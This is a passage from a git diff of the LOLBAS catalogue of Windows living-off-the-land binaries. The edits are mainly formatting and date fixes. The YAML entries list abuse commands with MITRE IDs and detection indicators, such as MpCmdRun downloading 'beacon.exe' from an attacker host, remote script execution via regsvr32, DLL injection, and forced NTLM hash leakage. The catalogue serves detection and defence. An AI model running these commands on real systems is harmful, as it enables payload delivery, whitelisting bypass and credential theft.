C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -39,4 +39,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 6679d5e..a30c11a 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml 
@@ -2,7 +2,7 @@ Name: Jsc.exe Description: Binary file used by .NET to compile javascript code to .exe or .dll format Author: 'Oddvar Moe' -Created: '2019-05-31' +Created: 2019-05-31 Commands: - Command: jsc.exe scriptfile.js Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. @@ -25,14 +25,14 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: Jsc.exe should normally not run a system unless it is used for development. + - IOC: Jsc.exe should normally not run a system unless it is used for development. Resources: - Link: https://twitter.com/DissectMalware/status/998797808907046913 - Link: https://www.phpied.com/make-your-javascript-a-windows-exe/ Acknowledgement: - Person: Malwrologist Handle: '@DissectMalware' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 89e332e..614a280 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -2,7 +2,7 @@ Name: Makecab.exe Description: Binary to package existing files into a cabinet (.cab) file Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. @@ -31,7 +31,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Makecab getting files from Internet @@ -41,4 +41,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index d1d1530..37a0ade 100644 
--- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -2,7 +2,7 @@ Name: Mavinject.exe Description: Used by App-v in Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll Description: Inject evil.dll into a process with PID 3110. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: mavinject.exe should not run unless APP-v is in use on the workstation @@ -36,4 +36,4 @@ Acknowledgement: Handle: '@gN3mes1s' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index b08bedd..c929fb6 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -2,7 +2,7 @@ Name: Microsoft.Workflow.Compiler.exe Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. Author: 'Conor Richard' -Created: '2018-10-22' +Created: 2018-10-22 Commands: - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file. @@ -19,7 +19,7 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code 
@@ -27,10 +27,10 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. @@ -53,4 +53,4 @@ Acknowledgement: Handle: '@FortyNorthSec' - Person: Bank Security Handle: '@Bank_Security' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index ab0fb79..3be81b8 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -2,7 +2,7 @@ Name: Mmc.exe Description: Load snap-ins to locally and remotely manage Windows systems Author: '@bohops' -Created: '2018-12-04' +Created: 2018-12-04 Commands: - Command: mmc.exe -Embedding c:\path\to\test.msc Description: Launch a 'backgrounded' MMC process and invoke a COM payload @@ -15,10 +15,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ Acknowledgement: diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 57da8bd..eee65a8 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -2,7 +2,7 @@ Name: MpCmdRun.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender Author: 'Oddvar Moe' -Created: '09/03/2020' +Created: 2020-03-20 Commands: - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) 
@@ -32,9 +32,9 @@ Full_Path: - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: MpCmdRun storing data into alternate data streams. - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. @@ -54,4 +54,4 @@ Acknowledgement: Handle: '' - Person: Cedric Handle: '@th3c3dr1c' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index b5bfbe5..c9d598c 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -1,8 +1,8 @@ --- -Name: Msbuild.exe +Name: Msbuild.exe Description: Used to compile and execute code Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msbuild.exe pshell.xml Description: Build and execute a C# project stored in the target XML file. @@ -27,7 +27,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Msbuild.exe should not normally be executed on workstations @@ -41,4 +41,4 @@ Acknowledgement: Handle: '@subtee' - Person: Cn33liz Handle: '@Cneelis' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 6f9dbfc..7e1cc1f 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml 
@@ -2,7 +2,7 @@ Name: Msconfig.exe Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Msconfig.exe -5 Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\msconfig.exe -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml Detection: - IOC: mscfgtlc.xml changes in system32 folder @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index b460d25..ed2f045 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -1,8 +1,8 @@ --- Name: Msdt.exe -Description: Microsoft diagnostics tool +Description: Microsoft diagnostics tool Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. 
@@ -23,15 +23,15 @@ Commands: Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml Detection: - - IOC: + - IOC: Resources: - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - Link: https://twitter.com/harr0ey/status/991338229952598016 Acknowledgement: - - Person: + - Person: Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index d5ef45f..ea69e13 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -2,7 +2,7 @@ Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: mshta.exe evilfile.hta Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. @@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct Detection: - IOC: mshta.exe executing raw or obfuscated script within the command-line 
@@ -48,10 +48,10 @@ Resources: - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 8d52eb1..944b991 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -2,7 +2,7 @@ Name: Msiexec.exe Description: Used by Windows to execute msi files Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msiexec /quiet /i cmd.msi Description: Installs the target .MSI file silently. @@ -35,11 +35,11 @@ Commands: Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: msiexec.exe getting files from Internet @@ -51,4 +51,4 @@ Acknowledgement: Handle: '@netbiosX' - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 63b0d40..e81499a 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml 
@@ -2,7 +2,7 @@ Name: Netsh.exe Description: Netsh is a Windows tool used to manipulate network interface settings. Author: 'Freddie Barr-Smith' -Created: '2019-12-24' +Created: 2019-12-24 Commands: - Command: netsh.exe add helper C:\Users\User\file.dll Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Netsh initiating a network connection @@ -32,4 +32,4 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 2ed0304..0102b45 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -2,7 +2,7 @@ Name: Odbcconf.exe Description: Used in Windows for managing ODBC connections Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: odbcconf -f file.rsp Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\odbcconf.exe - Path: C:\Windows\SysWOW64\odbcconf.exe -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp Detection: - IOC: @@ -36,4 +36,4 @@ Acknowledgement: Handle: '@subtee' - Person: Adam Handle: '@Hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index c568598..dc1fa0e 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -2,7 +2,7 @@ Name: Pcalua.exe Description: Program Compatibility Assistant Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: pcalua.exe -a calc.exe Description: Open the target .EXE using the Program Compatibility Assistant. 
@@ -30,7 +30,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\pcalua.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -41,4 +41,4 @@ Acknowledgement: Handle: '@kylehanslovan' - Person: Fab Handle: '@0rbz_' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index 2e3c31c..bd21f1c 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -2,7 +2,7 @@ Name: Pcwrun.exe Description: Program Compatibility Wizard Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Pcwrun.exe c:\temp\beacon.exe Description: Open the target .EXE file with the Program Compatibility Wizard. @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\pcwrun.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -23,4 +23,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 29730a4..0a78757 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -2,7 +2,7 @@ Name: Pktmon.exe Description: Capture Network Packets on the windows 10 with October 2018 Update or later. Author: 'Derek Johnson' -Created: '2020-08-12' +Created: 2020-08-12 Commands: - Command: pktmon.exe start --etw Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop @@ -23,9 +23,9 @@ Commands: Full_Path: - Path: c:\windows\system32\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe -Code_Sample: +Code_Sample: - Code: -Detection: +Detection: - IOC: .etl files found on system Resources: - Link: https://binar-x79.com/windows-10-secret-sniffer/ 
diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 0733048..fdfb3aa 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -2,7 +2,7 @@ Name: Presentationhost.exe Description: File is used for executing Browser applications Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Presentationhost.exe C:\temp\Evil.xbap Description: Executes the target XAML Browser Application (XBAP) file @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index a91dd92..3bac72e 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -2,7 +2,7 @@ Name: Print.exe Description: Used by Windows to send files to the printer Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. @@ -31,7 +31,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\print.exe - Path: C:\Windows\SysWOW64\print.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Print.exe getting files from internet @@ -42,4 +42,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml index 4a37660..dc59849 100644 --- a/yml/OSBinaries/Psr.yml +++ b/yml/OSBinaries/Psr.yml 
@@ -2,7 +2,7 @@ Name: Psr.exe Description: Windows Problem Steps Recorder, used to record screen and clicks. Author: Leon Rodenko -Created: '2020-06-27' +Created: 2020-06-27 Commands: - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. @@ -15,9 +15,9 @@ Commands: Full_Path: - Path: c:\windows\system32\psr.exe - Path: c:\windows\syswow64\psr.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: psr.exe spawned - IOC: suspicious activity when running with "/gui 0" flag Resources: diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index e9276d5..6a7419c 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -2,9 +2,9 @@ Name: Rasautou.exe Description: Windows Remote Access Dialer Author: 'Tony Lambert' -Created: '2020-01-10' +Created: 2020-01-10 Commands: - - Command: rasautou -d powershell.dll -p powershell -a a -e e + - Command: rasautou -d powershell.dll -p powershell -a a -e e Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10. Usecase: Execute DLL code Category: Execute @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 Full_Path: - Path: C:\Windows\System32\rasautou.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: rasautou.exe command line containing -d and -p @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: FireEye Handle: '@FireEye' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 7d5f928..0a1de91 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml 
@@ -2,7 +2,7 @@ Name: Reg.exe Description: Used to manipulate the registry Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\reg.exe - Path: C:\Windows\SysWOW64\reg.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: reg.exe writing to an ADS @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 1729e21..507698c 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -2,9 +2,9 @@ Name: Regasm.exe Description: Part of .NET Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - - Command: regasm.exe AllTheThingsx64.dll + - Command: regasm.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL bypass @@ -12,7 +12,7 @@ Commands: MitreID: T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: regasm.exe /U AllTheThingsx64.dll + - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: Execute @@ -25,7 +25,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: regasm.exe executing dll file 
diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 1a52026..c0fba2c 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -2,7 +2,7 @@ Name: Regedit.exe Description: Used by Windows to manipulate registry Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Description: Export the target Registry key to the specified .REG file. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\regedit.exe - Path: C:\Windows\SysWOW64\regedit.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: regedit.exe reading and writing to alternate data stream @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index ce20f4c..2afa964 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml @@ -2,7 +2,7 @@ Name: Regini.exe Description: Used to manipulate the registry Author: 'Oddvar Moe' -Created: '2020-07-03' +Created: 2020-07-03 Commands: - Command: regini.exe newfile.txt:hidden.ini Description: Write registry keys from data inside the Alternate data stream. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\regini.exe - Path: C:\Windows\SysWOW64\regini.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: regini.exe reading from ADS @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Eli Salem Handle: '@elisalem9' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index a19a039..46464c3 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml 
@@ -2,7 +2,7 @@ Name: Register-cimprovider.exe Description: Used to register new wmi providers Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Register-cimprovider -path "C:\folder\evil.dll" Description: Load the target .DLL. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 274d275..048a415 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -2,7 +2,7 @@ Name: Regsvcs.exe Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\regsvcs.exe - Path: C:\Windows\SysWOW64\regsvcs.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 02e262b..7ef5375 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -2,7 +2,7 @@ Name: Regsvr32.exe Description: Used by Windows to register dlls Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. @@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: regsvr32.exe getting files from Internet 
@@ -51,4 +51,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index 85bbdbc..398f2a6 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -1,12 +1,12 @@ --- Name: Replace.exe -Description: Used to replace file with another file +Description: Used to replace file with another file Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: replace.exe C:\Source\File.cab C:\Destination /A Description: Copy file.cab to destination - Usecase: Copy files + Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A Description: Download/Copy bar.exe to outdir - Usecase: Download file + Usecase: Download file Category: Download Privileges: User MitreID: T1105 @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\replace.exe - Path: C:\Windows\SysWOW64\replace.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Replace.exe getting files from remote server @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: elceef Handle: '@elceef' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 3c2d344..38e67b0 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -2,7 +2,7 @@ Name: Rpcping.exe Description: Used to verify rpc connection Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. 
@@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\rpcping.exe - Path: C:\Windows\SysWOW64\rpcping.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -28,4 +28,4 @@ Acknowledgement: Handle: '@subtee' - Person: Vincent Yiu Handle: '@vysecurity' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 2b7c2b1..52ff1aa 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -2,7 +2,7 @@ Name: Rundll32.exe Description: Used by Windows to execute dll files Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe AllTheThingsx64,EntryPoint Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. @@ -65,13 +65,13 @@ Commands: Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Category: Execute Privileges: User - MitreID: - MitreLink: + MitreID: + MitreLink: OperatingSystem: Windows 10 (and likely previous versions) Full_Path: - Path: 